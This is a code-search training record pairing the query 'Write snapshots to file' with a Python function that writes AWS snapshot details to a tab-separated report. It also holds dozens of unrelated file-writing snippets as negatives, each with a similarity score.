objFile = open(file_name, 'w')\r\n for row in lst_Inventory:\r\n lstValues = [cd_instance.cd_id, cd_instance.cd_title, cd_instance.cd_artist]\r\n lstValues[0] = str(lstValues[0])\r\n objFile.write(','.join(lstValues) + '\\n')\r\n objFile.close()" ]
[ "0.62202305", "0.59282184", "0.59282184", "0.5797909", "0.57411486", "0.570655", "0.5696261", "0.5676645", "0.5656309", "0.56229556", "0.5577266", "0.5544393", "0.55409503", "0.5499961", "0.5476858", "0.5472212", "0.54446274", "0.5439978", "0.54305", "0.54144007", "0.53972524", "0.53766423", "0.53749436", "0.536948", "0.53655744", "0.53638554", "0.53552955", "0.5350401", "0.5343024", "0.5334971", "0.5328791", "0.5327325", "0.53257334", "0.53246444", "0.5323475", "0.53233963", "0.5315777", "0.53144735", "0.531244", "0.5301461", "0.5298637", "0.5297545", "0.52948457", "0.52935994", "0.5286618", "0.5284697", "0.5283734", "0.52759576", "0.52641344", "0.52607715", "0.5257288", "0.52495974", "0.52427685", "0.5239556", "0.5224378", "0.5222467", "0.5214352", "0.52115524", "0.5210862", "0.52093524", "0.51981527", "0.51960486", "0.5176407", "0.51758045", "0.5168027", "0.5162726", "0.51552", "0.51490945", "0.51448107", "0.51419854", "0.51399165", "0.513878", "0.512988", "0.511849", "0.5113398", "0.5104581", "0.51026535", "0.51015246", "0.5101265", "0.50962776", "0.5095861", "0.5092839", "0.50917935", "0.5080719", "0.50722533", "0.50703216", "0.5064683", "0.50629425", "0.50603604", "0.5059736", "0.5058036", "0.505763", "0.504957", "0.50487757", "0.50465643", "0.5045428", "0.5044767", "0.5042788", "0.50402915", "0.5039725" ]
0.59575117
1
Write snapshots to file
def generateInfoSnapshots(regions): print "Writing snapshots info to output file %s" % snapshots_data_output_file snapshots = [] for r in regions: snapshots += getSnapshotsD(r) print "." # feedback for the user with open(snapshots_data_output_file, 'w') as f2: f2.write("SNAPSHOTS\n") f2.write( "Name\tsnapshot_id\tKEEP-tag_of_snapshot\tKEEP-tag_of_AMI\tproduction?\tassociated_AMI\tstart_time\tstatus" "\tregion\tprogress\tassociated_volume\tvolume_size\tdescription\n\n") for s in snapshots: f2.write("%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n" % (s['Name'], s['id'], s['KEEP-tag'], s['AMI_KEEP-tags'], s['PROD'], s['AMI(s)'], s['start_time'], s['status'], s['region'], s['progress'], s['volume_id'], s['volume_size'], s['Description']))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def write_snapshot(self):\n json.dump(self.snapshot, open(paths.RESULTS_FILE, 'w'), indent=4, sort_keys=True)", "def saveSnapshot(self, filename): \n\t\tpass", "def write_to_file(self, filename: str) -> None:", "def save_snapshot(args):\n html_doc = document.Document(get_code(args.file))\n info = html_doc.save(args.message, date=args.edition, region=args.region)\n if info is None:\n print('Duplicate snapshot. No snapshot saved.')\n else:\n print('Snapshot saved for {:s} {:%B %d, %Y}. '.format(info[2].capitalize(), info[3]) +\n '{0!r:} - {1:%B} {1.day:2}, {1:%Y %l:%M:%S.%f %p}'.format(info[0], info[1]))", "def write(self, filename):\n pass", "def write(self, filename):\n pass", "def write_snapshots_single_file(dynGraph: DynGraphSN, outputFile: str,both_directions=False):\n f = open(outputFile,\"w\")\n allGraphs = dynGraph.snapshots()\n for t,g in allGraphs.items():\n for e in g.edges():\n weights=\" \"+str(1)\n f.write(str(t)+\" \"+str(e[0])+\" \"+str(e[1])+weights+\"\\n\")\n if both_directions:\n f.write(str(t) + \" \" + str(e[1]) + \" \" + str(e[0]) + weights + \"\\n\")\n f.close()", "def _write(self, schema, writer, snapshots):\n encoder = self.serializer\n doc = {\n META_SCHEMA: [encoder.serialize_column(c) for c in schema],\n META_SNAPSHOTS: [encoder.serialize_snapshot(s) for s in snapshots],\n META_ROWCOUNT: writer.row_counter,\n META_PRIMARYKEY: self._primary_key\n }\n with open(self.tmpmetafile, 'w') as f:\n json.dump(doc, f, cls=self.encoder)\n # Close the archive writer.\n writer.close()\n # Replace existing files with temporary files for new archive version.\n # This is the point of no return.\n # TODO: Instead of moving files we could delete (or keep) previous\n # files as backup.\n shutil.move(src=self.tmpmetafile, dst=self.metafile)\n shutil.move(src=self.tmpdatafile, dst=self.datafile)", "def save_snapshot(snapshot_id):\n\n if comm is not None:\n comm.barrier() # if parallel, ensure that we are always in sync, so snapshots are always a consistent set\n\n if ns_args['snapshot_per_parallel_task']:\n rank_id = \"%d\" % rank\n else:\n rank_id = \"ALL\"\n\n if ns_args['snapshot_per_parallel_task'] or rank == 0:\n try:\n snapshot_io = open(ns_args['out_file_prefix']+'snapshot.%s.%s.%s' % (snapshot_id, rank_id, ns_args['config_file_format']), \"w\")\n except:\n snapshot_io = open(ns_args['out_file_prefix']+'snapshot.%d.%s.%s' % (snapshot_id, rank_id, ns_args['config_file_format']), \"w\")\n\n root_walkers_write_t0 = time.time()\n for at in walkers:\n at.info['volume'] = at.get_volume()\n at.info['iter']=snapshot_id\n ase.io.write(snapshot_io, at, format=ns_args['config_file_format'])\n print \"root walkers write time \", time.time() - root_walkers_write_t0\n\n if not ns_args['snapshot_per_parallel_task']:\n if comm is not None: # gather other walkers to do I/O on master task\n if rank == 0: # I/O on master task\n for r in range(1,size):\n remote_walkers_recv_t0 = time.time()\n remote_walkers = comm.recv(source=r, tag=2)\n print \"save_snapshot remote walkers recv time \", r, time.time() - remote_walkers_recv_t0\n remote_walkers_write_t0 = time.time()\n for at in remote_walkers:\n at.info['volume'] = at.get_volume()\n at.info['iter']=snapshot_id\n ase.io.write(snapshot_io, at, format=ns_args['config_file_format'])\n print \"save_snapshot remote walkers write time \", r, time.time() - remote_walkers_write_t0\n else: # not master task\n comm.send(walkers, dest=0, tag=2)\n\n if ns_args['snapshot_per_parallel_task'] or rank == 0:\n snapshot_io.close()", "def write(self, outfile, rebasings=None):\r\n raise NotImplementedError()", "async def snapshots(secspy, cameras):\n _LOGGER.info(\"SAVE SNAPSHOTS:\")\n\n for camera in cameras:\n filename = f\"snapshot_{camera}.jpg\"\n image = await secspy.get_snapshot_image(camera)\n with open(filename, \"wb\") as img_file:\n _LOGGER.info(f\"Writing snapshot {filename}\")\n img_file.write(image)\n time.sleep(1)", "def saveStatsFile(self):\n if not os.path.exists(\"stats\"):\n os.mkdir(\"stats\")\n now = datetime.datetime.now()\n parts = [now.year, now.month, now.day]\n parts = [\"%02d\"%x for x in parts]\n todaysFileName = \"-\".join(parts)+\".txt\" \n timeStamp = time.strftime(\"%y%m%d%H%M\", time.localtime())\n log = \",\".join(self.logLinesStats)\n fname = \"stats/\"+todaysFileName\n with open(fname, 'a') as f:\n f.write(timeStamp+\",\"+log+\"\\n\")\n self.log(\"wrote \"+fname)", "def _write(self):\n\n output_path = os.path.join(config.S3_OUTPUT, config.DATAFRAME_ARTISTS)\n dataframe = self._cache.get_source(config.DATAFRAME_ARTISTS)\n\n print('Writing dataframe to {}'.format(output_path))\n\n dataframe.write.parquet(\n output_path,\n mode='overwrite'\n )", "def write_snapshots(dynGraph:DynGraphSN, outputDir:str, format:str=None):\n if format==None:\n format=\"edges\"\n allGraphs = dynGraph.snapshots()\n for g in allGraphs:\n _write_network_file(allGraphs[g],os.path.join(outputDir,str(g)),out_format=format)", "def write(self, filename): # real signature unknown; restored from __doc__\n pass", "def write(self, fname):\n pass", "def writestat(self, snapshot, halos, statoutfile, hubble=None):\n s = snapshot\n mindarkmass = min(s.dark['mass'])\n\n if hubble is None:\n hubble = s.properties['h']\n\n outfile = statoutfile\n logger.info(\"Writing stat file to %s\" % statoutfile)\n fpout = open(outfile, \"w\")\n header = \"#Grp N_tot N_gas N_star N_dark Mvir(M_sol) Rvir(kpc) GasMass(M_sol) StarMass(M_sol) DarkMass(M_sol) V_max R@V_max VelDisp Xc Yc Zc VXc VYc VZc Contam Satellite? False? ID_A\"\n print >> fpout, header\n nhalos = halos._nhalos\n for ii in xrange(nhalos):\n h = halos[ii + 1].properties # halo index starts with 1 not 0\n # 'Contaminated'? means multiple dark matter particle masses in halo)\"\n icontam = np.where(halos[ii + 1].dark['mass'] > mindarkmass)\n if (len(icontam[0]) > 0):\n contam = \"contam\"\n else:\n contam = \"clean\"\n # may want to add implement satellite test and false central\n # breakup test.\n\n n_dark = h['npart'] - h['n_gas'] - h['n_star']\n M_dark = h['mass'] - h['M_gas'] - h['M_star']\n ss = \" \" # can adjust column spacing\n outstring = str(int(h['halo_id'])) + ss\n outstring += str(int(h['npart'])) + ss + str(int(h['n_gas'])) + ss\n outstring += str(int(h['n_star'])) + ss + str(int(n_dark)) + ss\n outstring += str(h['mass'] / hubble) + ss + \\\n str(h['Rvir'] / hubble) + ss\n outstring += str(h['M_gas'] / hubble) + ss + \\\n str(h['M_star'] / hubble) + ss\n outstring += str(M_dark / hubble) + ss\n outstring += str(h['Vmax']) + ss + str(h['Rmax'] / hubble) + ss\n outstring += str(h['sigV']) + ss\n # pos: convert kpc/h to mpc (no h).\n outstring += str(h['Xc'] / hubble / 1000.) + ss\n outstring += str(h['Yc'] / hubble / 1000.) + ss\n outstring += str(h['Zc'] / hubble / 1000.) + ss\n outstring += str(h['VXc']) + ss + \\\n str(h['VYc']) + ss + str(h['VZc']) + ss\n outstring += contam + ss\n outstring += \"unknown\" + \\\n ss # unknown means sat. test not implemented.\n outstring += \"unknown\" + ss # false central breakup.\n print >> fpout, outstring\n fpout.close()\n return 1", "def writehalos(self, snapshot, halos, hubble=None, outfile=None):\n s = snapshot\n grpoutfile = s.filename + \".amiga.grp\"\n statoutfile = s.filename + \".amiga.stat\"\n tipsyoutfile = s.filename + \".amiga.gtp\"\n halos.writegrp(s, halos, grpoutfile)\n halos.writestat(s, halos, statoutfile, hubble=hubble)\n shalos = halos.writetipsy(s, halos, tipsyoutfile, hubble=hubble)\n return shalos", "def dump(self, filename, mode='w', rebox=False):\n from os import path\n filepath = path.abspath(path.expanduser(filename))\n if mode == 'w':\n open(filepath, 'w').close() \n for t, ts in self:\n ts.dump(filename, rebox=rebox)", "def save_file(map_, args): \n if args.segments:\n p = os.path.join(args.res_dir, 'compression_'+args.db+\"_seg\")\n else:\n p = os.path.join(args.res_dir, 'compression_'+args.db)\n with open(p, 'w') as f:\n for file in map_:\n f.write(\"{} {}\\n\".format(file, map_[file]))", "def snapshot(self, filename=None):\n if filename:\n self.command(\"snapshot %(filename)s\" % locals())\n else:\n self.command(\"snapshot\")", "def test_16_0_saveToFile(self):\n\n Rectangle.save_to_file([self.r1, self.r2])\n self.assertTrue(os.path.isfile(\"Rectangle.json\"))", "def save_meta_file(gen_dict, f_name):\r\n logger = custom_logger.CustomLogger(run_id+':'+file_id)\r\n filename = run_id+'_'+ f_name +'.meta'\r\n f = open(os.path.join(unique_op_dir, filename),'a')\r\n print('Output stored in %s'%(str(os.path.join(unique_op_dir, filename))))\r\n logger.info('Output stored in %s'%(str(os.path.join(unique_op_dir, filename))))\r\n for key, val in gen_dict.items():\r\n line = str(key)+\" : \"+str(val)+\"\\n\"\r\n f.write(line)", "def file_output(matches: list, output_file_name: str = 'matches.txt'):\n with open(\"test/Matches/\" + output_file_name, 'w') as f:\n for match in matches:\n for event in match.events:\n f.write(\"%s\\n\" % event.payload)\n f.write(\"\\n\")", "def write_to_file(info: List[str]) -> None:\n return", "def write_to_file(self, filepath, mode = \"a\"): \n if \"r\" in mode: \n print(\"Only accepts write and append modes\")\n return \n with open(filepath, mode) as f: \n f.write(\"{}\\n\".format(self.title))\n verified, seen, ratio = self.get_verified_ratio()\n f.write(\"Verified Names: {}\\n\".format(str(verified)))\n f.write(\"Names: {}\\n\".format(str(seen)))\n f.write(\"Ratio: {}\\n\".format(str(ratio)))", "def save_graph(self, widget, data=None):\n\t\t#un po' di pulizia prima di fare il salvataggio\n\t\tos.system(\"find ./extra/MonitorGraph/ -type f -not -name '*.png' | xargs rm -f\")\n\t\tsnapshotFile =\"./extra/UserOutput/Snapshot\"+time.strftime(\"%Y%m%d-%H%M\", time.gmtime())+\".tar\"\n\t\tos.system(\"tar -cf \"+snapshotFile+\" --exclude def* --directory ./extra/ MonitorGraph/\")\n\t\tprint \"Snapshot saved to\",snapshotFile", "def write_file(self, filename, contents):\n blob = self.repo.create_blob(contents)\n self.index.add(pygit2.IndexEntry(filename, blob, pygit2.GIT_FILEMODE_BLOB))", "def writeFile(fileName, profile, singleScores, bestMotifs, dnaScores, bestMotif):\n with open(fileName, 'w+') as f:\n f.write(strftime(\"Created on: %Y-%m-%d %H:%M:%S\\n\", localtime()))\n f.write('Best Motifs: ')\n f.write('\\n')\n json.dump(bestMotif, f)\n f.write('\\n')\n f.write('Motifs Profile: ')\n f.write('\\n')\n json.dump(profile, f)\n f.write('\\n')\n f.write('Single Scores: ')\n f.write('\\n')\n for i in range(0, len(singleScores)):\n json.dump(bestMotifs[i], f)\n f.write(': ')\n json.dump(singleScores[i], f)\n f.write('\\n')\n f.write('Motifs that have a better score than the worst scoring one: ')\n f.write('\\n')\n for scores in dnaScores:\n json.dump(scores, f)\n f.write('\\n')", "def write_file(self, filename, fileformat=\"json\"):\n if self.df_avg is None:\n self.collect_stats()\n if fileformat == \"json\":\n self.write_json(filename)\n elif fileformat == \"excel\":\n self.write_excel(filename)", "def filewrite(self, filename):\n io.write(self, filename)", "def write_info_to_file(self):\n\n self.info.write_mission_info()\n\n self.logger.info(\"Mission instance write succeeded.\")", "def write_file(*args, **kwargs): # real signature unknown\n pass", "def write_file(self):\n if self._write_file == None:\n return\n\n try:\n out = file(self._write_file, \"w\")\n except IOError, e:\n print e\n sys.exit(1)\n out.writelines(\"A cases\") \n out.close()", "def write_results(detections, filename):\n start = time.time()\n\n boxes, labels, scores = detections\n with PathManager.open(filename, \"w\") as f:\n for key in boxes.keys():\n for box, label, score in zip(boxes[key], labels[key], scores[key]):\n f.write(\n \"%s,%.03f,%.03f,%.03f,%.03f,%d,%.04f\\n\"\n % (key, box[1], box[0], box[3], box[2], label, score)\n )\n\n logger.info(\"AVA results wrote to %s\" % filename)\n logger.info(\"\\ttook %d seconds.\" % (time.time() - start))", "def save(self, fn: str) -> None:\n fout = open(fn, 'w')\n for t,x in zip(self.times,self.milestones):\n fout.write('%f\\t%d '%(t,len(x)))\n fout.write(' '.join([str(xi) for xi in x]))\n fout.write('\\n')\n fout.close()", "def to_file(self, filename=None):\n name = None\n if filename is not None:\n name = filename\n elif self.name:\n name = self.name\n\n if name:\n #f = open(self.name, 'w')\n f = codecs.open(name, 'w', encoding='utf-8')\n self.seek(0)\n f.write(self.read())\n f.close()\n else:\n print \"No log_name for this log\"", "def store(self, filename):", "def write(self):\n f, ds = self.opendset()\n #\n # Now add the images\n #\n start_time = time.clock() # time this\n nframes = 0 # number completed\n print_every = 1; marker = \" .\";\n print('Frames written (of %s):' % self.ntowrite, end=\"\")\n for i in range(self.nfiles):\n if nframes >= self.ntowrite: break\n\n logging.debug('processing file %d of %d' % (i+1, self.nfiles))\n img_i = fabio.open(self.files[i])\n nfi = img_i.nframes\n for j in range(nfi):\n msg = '... file %d/image %d' % (i, j)\n logging.debug(msg)\n if j < self.nempty:\n logging.debug('... empty frame ... skipping')\n else:\n ds[nframes, :, :] = img_i.data\n nframes += 1\n if numpy.mod(nframes, print_every) == 0:\n print(marker, nframes, end=\"\")\n print_every *= 2\n sys.stdout.flush()\n logging.debug('... wrote image %s of %s' %\\\n (nframes, self.ntowrite))\n if nframes >= self.ntowrite:\n logging.debug('wrote last frame: stopping')\n break\n if j < nfi - 1:\n # on last frame in file, fabio will look for next file\n img_i = img_i.next()\n\n f.close()\n print(\"\\nTime to write: %f seconds \" %(time.clock()-start_time))", "def save_quickstreams(quickstreams):\n with open('quickstreams.txt', 'w') as f:\n json.dump(quickstreams, f, indent=4)", "def write_image(out, frame):\n if not os.path.exists(out):\n os.makedirs(out)\n now = datetime.now() \n dt_string = now.strftime(\"%H-%M-%S-%f\") \n filename = f'{out}/{dt_string}.png'\n logging.info(f'write image {filename}')\n cv2.imwrite(filename, frame)", "def __write_measurement(self, measurement):\n with self.__filename.open(mode='a') as history_file:\n history_file.write(measurement + '\\n')", "def write_output_file(self, index):\n ctx = self.block_store.make_local_output(self.expected_outputs[index])\n self.open_output_contexts[index] = ctx\n return ctx.get_filename()", "def _toFile(self):\n pass", "def write(self, outfile):\n outfile.write(\n '\\t'.join(\n [\n str(i) for i in [\n self.chrom, self.start, self.end, self.name,\n self.count, self.fold_change, self.log10p\n ]\n ]\n )\n )\n outfile.write('\\n')", "def writefile():\n\n print(\"Writing to file...\")\n\n # Open the heartbeat file in append mode and save the current time.\n with open(settings.ROOT_DIR + \"/heartbeat\", \"a\") as f:\n f.write(str(time()))", "def saveToFile(html):\n #print(\"Saving to file.\")\n html += \"\\n\"\n #open necessary files to save\n logFile = open(\"postLog_{0}_{1}.txt\".format(os.path.splitext(path)[0], dateTimeNow), \"a\")\n logFile.write(html)\n logFile.close()\n #print(\"Check Point.\")", "def save_outputs(d, dst_dir, site, file_format='json', write_mode='w'):\n \n \n min_date_str = str(min([pd.Timestamp(x) for x in d.keys()]).date())\n max_date_str = str(max([pd.Timestamp(x) for x in d.keys()]).date())\n fn = '_'.join([site, min_date_str, max_date_str]) + '.' + file_format\n dst = os.path.join(dst_dir, fn)\n with open(dst, write_mode) as f:\n if (file_format == 'json') & (write_mode =='w'):\n json.dump(d, f)\n elif (file_format == 'pkl') & (write_mode == 'wb'):\n pickle.dump(d, f)\n else:\n raise ValueError(\"File format or write mode incorrect.\\nOptions are 1) 'json', 'w' and 2) 'pkl', 'wb'\")", "def write_backup_file(backup_file, backup_data):\n\n fp = open(backup_file, mode=\"w\")\n\n for record in backup_data.values():\n json_str = json.dumps(record)\n fp.write(json_str)\n fp.write(\"\\n\")\n\n fp.close()", "def write_file(self):\n rl_df, lift_df = self.create_df()\n\n number = re.findall('\\d+', self.url)[0]\n\n if self.write is True:\n with open('house_{}.csv'.format(number), 'w',\n encoding='utf-8-sig') as file:\n rl_df.to_csv(file, sep=';')\n with open('house_lifts_{}.csv'.format(number), 'w',\n encoding='utf-8-sig') as file2:\n lift_df.to_csv(file2, sep=';')", "def save_meta(self):\n # jOut = os.path.join(self.meta[\"wdir\"], meta_file)\n with open(self.meta_filepath, \"w\") as f:\n json.dump(self.meta, f)", "def save(self,outPath=None):\n if (not self.canSave): raise StateError(_(\"Insufficient data to write file.\"))\n if not outPath:\n fileInfo = self.fileInfo\n outPath = os.path.join(fileInfo.dir,fileInfo.name)\n out = file(outPath,'wb')\n #--Tes3 Record\n self.tes3.setChanged()\n self.tes3.hedr.setChanged()\n self.tes3.hedr.numRecords = len(self.records) #--numRecords AFTER TES3 record\n self.tes3.getSize()\n self.tes3.dump(out)\n #--Other Records\n for record in self.records:\n record.getSize()\n record.dump(out)\n out.close()", "def write_to_file(self, papers, filename):\n\t\tpass", "def write_the_contents_to_the_same_file(self):\n if not len(self.student_list):\n print('There is no contents to write')\n return\n\n if self._filename is None:\n self._filename = self.input_filename()\n\n with open(self._filename, 'w') as OUT:\n OUT.write(self.student_list.to_csv(date_format='%Y-%m-%d',\n sep='\\t', header=False, columns=self.columns_to_save))\n print(f'Data are saved into {self._filename!r}')", "def write(self, filename):\n\n self.__image.save(filename)", "def save(self, fname, snver=None):\n self._io.save(fname)", "def write_to_file(fib_details: dict):\n pass # TODO: Replace with implementation!", "def write_to_file(start_runtime, contents, write_mode='a'):\n with open(f\"{start_runtime}.txt\", write_mode) as f:\n f.write(\"Filename\\t\\tMaxTrack\\tNumInst\\t\\tTimeSig\\t\\tTPB\\n\")\n f.write(contents)", "def write_to_file(self, filename):\n self.octree.write(str.encode(filename))\n print(\"Save octomap to \"+filename)", "def write_to_file(self, file, content):\n with open(file, 'a') as report_file:\n report_file.write('{}\\n'.format(content))", "def log_event_to_file(event):\n with open('eventlogs/{}.json'.format(time.time()), 'w') as event_write:\n event_write.write(json_dumpstring(event))\n pass", "def write_thumbnails(self, appstruct):\n slugser = slugify(appstruct[\"serial\"])\n pdf_filename = \"thumbnails/%s/uploaded.pdf\" % slugser\n top_file = \"thumbnails/%s/top.png\" % slugser\n mos_file = \"thumbnails/%s/mosaic.png\" % slugser\n \n thumg = ThumbnailGenerator(pdf_filename)\n self.save_blob(thumg.top_thumbnail(), top_file)\n self.save_blob(thumg.mosaic_thumbnail(), mos_file)", "def write(self):\n # # Sometimes file is not written properly. So delete and rewrite it\n # os.system('rm {}'.format(snip_dir + '/' + self.name))\n # if 'NUM_TIME_STEPS' not in self.define.keys():\n # warnings.warn('NUM_TIME_STEPS missing in header. Execution may hang!')\n with open(snip_dir + '/' + self.name, 'w') as f:\n f.write('/* Temporary generated file for snip process definitions before compilation */\\n')\n f.write(self.__str__())\n\n # os.system('ls {}'.format(snip_dir + '/' + self.name))", "def save(self, filename):\n o = open(filename, 'w')\n o.write(self.write())\n o.close()", "def save(self, f):\n self.f = f\n for region in self.regions:\n ext = region.address & 0xFFFF0000\n self.write_hex_line(\n HexLine(0, EXTLINADR, struct.pack(\">H\", ext >> 16))\n )\n address = region.address - ext\n for chunk in chunks(region.data):\n if address >= 0x10000:\n ext += 0x10000\n self.write_hex_line(\n HexLine(0, EXTLINADR, struct.pack(\">H\", ext >> 16))\n )\n address -= 0x10000\n self.write_hex_line(HexLine(address, DATA, chunk))\n address += len(chunk)\n self.write_hex_line(HexLine(0, EOF))", "def write_hashes(filename):\n\n [head, tail] = os.path.split(filename)\n new_filename = f\"{head}/hashed-{tail}\"\n\n shutil.copy(filename, new_filename)\n\n with open(filename) as in_file:\n data = json.loads(in_file.read())\n\n click.echo(f\"Event ID: {data['event_id']}\")\n click.echo(\"Writing span hashes\")\n\n config = load_span_grouping_config({\"id\": DEFAULT_CONFIG_ID})\n results = config.execute_strategy(data)\n\n with open(new_filename, \"w\") as out_file:\n results.write_to_event(data)\n out_file.write(json.dumps(data, indent=4))\n\n click.echo(\"Done\")\n click.echo(\"\\n\")", "def write_map_to_file(dir, version, role, map_id, d):\n if not os.path.exists(dir):\n os.makedirs(dir)\n path = build_output_file_path(dir, version, role, map_id)\n with open(path, \"w\") as f:\n json.dump(d, f, sort_keys=True, indent=4)\n f.close()", "def write_output_shifts_to_file(self, shift_output):\n pass", "def store_action_log(self, filename):\n t = self.get_current_timeindex()\n camera_obs = self.get_camera_observation(t)\n self._action_log[\"final_object_pose\"] = {\n \"t\": t,\n \"pose\": camera_obs.object_pose,\n }\n\n with open(filename, \"wb\") as fh:\n pickle.dump(self._action_log, fh)", "def write_state_file(self, state):\r\n with open(StudentModuleHistoryCleaner.STATE_FILE, \"w\") as state_file:\r\n state_file.write(state)", "def GenerateRevisionFile(self):\n\n print 'Saving revision to %s' % self.revisions_path\n Write(\n self.revisions_path,\n ('{\"chromium_revision\":%d, \"webkit_revision\":%d, '\n '\"v8_revision\":%d}') % (self._chromium_revision,\n self._webkit_revision,\n self._v8_revision))", "def write_md_file(sip_uuid, filepath):\n sip = SIP.objects.get(pk=sip_uuid)\n md_object = load_file_data_from_db(sip, filepath)\n convert_md_object = json.dumps(\n md_object, sort_keys=True, ensure_ascii=False, indent=4\n )\n filename = os.path.join(filepath, \"metadata_output.json\")\n with open(filename, \"wb\") as f:\n f.write(six.ensure_binary(convert_md_object))", "def write_run(run):\n r=Run(run)\n r.write_all()", "def saveUsage(self, filePath):\n message = time.strftime('%c') + ' : '\n for spot in self.getParkingSpots():\n message += str(spot.id) + ', ' + spot.status + '; '\n with open(filePath, 'a+') as outfile:\n outfile.write(message + '\\n')\n pass", "def save(self, path, alignment, positions):\n path = path[7:]\n if path[-5:] != \".json\":\n path += \".json\"\n if path[0] == \"/\" and path[2] == \":\":\n path = path[1:] # Windows fix\n with open(path, \"w\") as outfile:\n value = {\n \"angleCommand\": self._angle_command,\n \"horizontalCommand\": self._horizontal_command,\n \"verticalCommand\": self._vertical_command,\n \"origin\": self._origin,\n \"frameWidth\": self._frame_width,\n \"frameHeight\": self._frame_height,\n \"runs\": [r.to_json() for r in self._runs],\n \"alignment\": alignment.to_dict(),\n \"positions\": positions.to_dict()\n }\n json.dump(value, outfile)", "def write_to_file(entry, file):\n with open(file, \"a\") as f:\n f.write(entry)", "def _file_writer(self, lines, filename):\n if self.MockRun:\n return\n\n if self.Verbose:\n print \"Writing file %s\" % filename\n\n updated_file = open(filename, 'w')\n updated_file.write(''.join(lines))\n updated_file.close()", "def write_file(self, contents):\n fd = open(os.path.join(os.path.dirname(__file__),\n 'data', 'test.html'), 'w')\n fd.write(contents)\n fd.close()", "def write_to_file(inventory):\n env = Environment(loader=FileSystemLoader('templates'), trim_blocks=True)\n output_template = env.get_template('output.j2')\n # create and clean an 'outputs' folder\n path = \"./outputs\"\n try:\n shutil.rmtree(path, ignore_errors = True, onerror = None)\n except:\n print('Error while deleting directory')\n os.mkdir(path)\n os.chdir(path)\n for node, node_data in inventory.items():\n if 'outputs' in node_data:\n os.mkdir(node)\n for command, output in node_data['outputs'].items():\n # when creating filenames based on command, swap 'spaces' with 'underscores':\n command = re.sub(r\"\\s\", r\"_\", command)\n open(f\"{node}/{command}.txt\", 'a').write(\n output_template.render(node=node, data=output))\n print(\"\\n\" + f\"Job complete. If data gathering was successful, see 'outputs' directory.\")\n return inventory", "def write_jobfile(self, copyfiles):\n with open(self.options.jobfile, 'w') as fd:\n fd.write(json.dumps(copyfiles, indent=2))", "def save_features_to_file(self):\n if not os.path.exists(self.features_save_path):\n os.makedirs(self.features_save_path)\n for s in self.sets:\n self.save_features_to_file_by_set(s)", "def write_s3_file(data, date):\n logger.info(\"Writing history file to S3.\")\n bucket = os.getenv(\"SPOTIFY_BUCKET_NAME\")\n path = os.getenv(\"SPOTIFY_BUCKET_PATH\")\n s3 = boto3.client('s3')\n data = json.dumps(data)\n s3.put_object(Bucket=bucket, Key=\"%s/%s.json\" % (path, date), Body=data)", "def write_image(self, filename):\n cv2.imwrite(filename, self.image)", "def write(self, filename, data):\n raise NotImplementedError", "def write(self, file):\n pos = file.tell()\n pickle.dump((self.index, self.meta, self.info), file)\n file.seek(0)\n\n # update the header with the position of the content index.\n file.write(struct.pack('<Q', pos))", "def _write(self, filename, data):\n fullpath = os.path.join(self._tempdir, filename)\n with open(fullpath, 'w') as ofile:\n json.dump(data, ofile)\n return fullpath", "def write(self, filename, mode=\"w\"):\n d = self._result_dict\n val = yaml.safe_dump(d, default_flow_style=False)\n\n with open(str(filename), mode) as outfile:\n outfile.write(val)", "def _write_file(output_path: str, file_content: Iterable[str]) -> None:\n with open(output_path, \"w+\", encoding=\"utf-8\") as f:\n f.writelines(file_content)\n\n logging.info(f\"wrote to '{output_path}'\")", "def write_file_set(self, write_file):\n self._write_file = write_file", "def writeAlltoFile(self):\n with open(self._fname, 'w') as f:\n for elem in self.getAll():\n line = self._writeGratoLine(elem)\n f.write(line + \"\\n\")\n f.close()", "def fileWrite(content):\n file = open('./result.txt', 'w')\n file.write(content)\n file.close()", "def writeOut(self):\n # import time\n self.outHeader = self.srcHeader\n for line in self.outHeader:\n self.outFile.write(line + '\\n')\n # now = time.asctime(time.localtime(time.time()))\n # self.outFile.write('%% -- %s -- Written to new alog' % now)\n for time_s in sorted(self.outData):\n for sens in self.outData[time_s]:\n for meas in self.outData[time_s][sens]:\n valu = self.outData[time_s][sens][meas]\n msg_list = [str(time_s), meas, sens, str(valu)]\n line_string = reconstructLine(msg_list)\n self.outFile.write(line_string + '\\n')", "def take_snapshot():\n df = scrape()\n for i in df.index:\n single = df.loc[i]\n # create or get locations\n loc, created = Location.objects.get_or_create(\n name=single['Location'],\n all_stands=single['Stands'],\n coordinates=single['Coords']\n )\n # add a new snapshot\n obj = Snapshot(\n location=loc,\n avail_bikes=single['Bikes'],\n free_stands=single['Free stands'],\n timestamp=datetime.now(tz=timezone('Europe/Warsaw'))\n )\n obj.save()", "def write_checkpoint(self):\n self.file_checkpoint_data = open(self.path_checkpoint, \"a+\")\n array_to_write = [str(self.radious), self.type_feature, self.type_filtering, self.h_filterig]\n self.file_checkpoint_data.write(','.join(array_to_write) + \"\\n\")\n self.file_checkpoint_data.flush()", "def write_to(self, filename):\n with open(filename, 'w') as f:\n for xx, yy in zip(self.x, self.y):\n f.write(\"%s %s\\n\" % (xx, yy))\n logger.info(\"Written locations into file {0}\".format(filename))", "def write_xyz_file(allxyz):\n if SAVEXYZ:\n print('+> Saving riverbed topography file...', end='')\n if MODE == 1:\n np.savetxt('kinoshita_topo.xyz', allxyz, fmt='%.6e')\n elif MODE == 2:\n np.savetxt(FNAME.rsplit('.', 1)[0] + '_topo.xyz', allxyz, fmt='%.6e')\n print(' [done]')", "def write(self, filename, *args, **kwargs):\n self.to_fits().writeto(filename, *args, **kwargs)", "def save(self, inst):\n n = inst.dimensions[\"n\"]\n with open(self.location, \"wt\") as f:\n f.write(f\"measurements: {n}\\n\")\n f.write(f\"time temperature\\n\")\n for time, temp in zip(inst.time, inst.temperature):\n f.write(f\"{time:4} {temp:12}\\n\")", "def save_as(self, filename):\n opencv.imwrite(filename, self.img)", "def log_to_file(text, status='INFO'):\n outfile = open(LogName, 'a')\n outfile.write(timestamp()+' - '+status+' - '+str(text)+'\\n')\n outfile.close()" ]
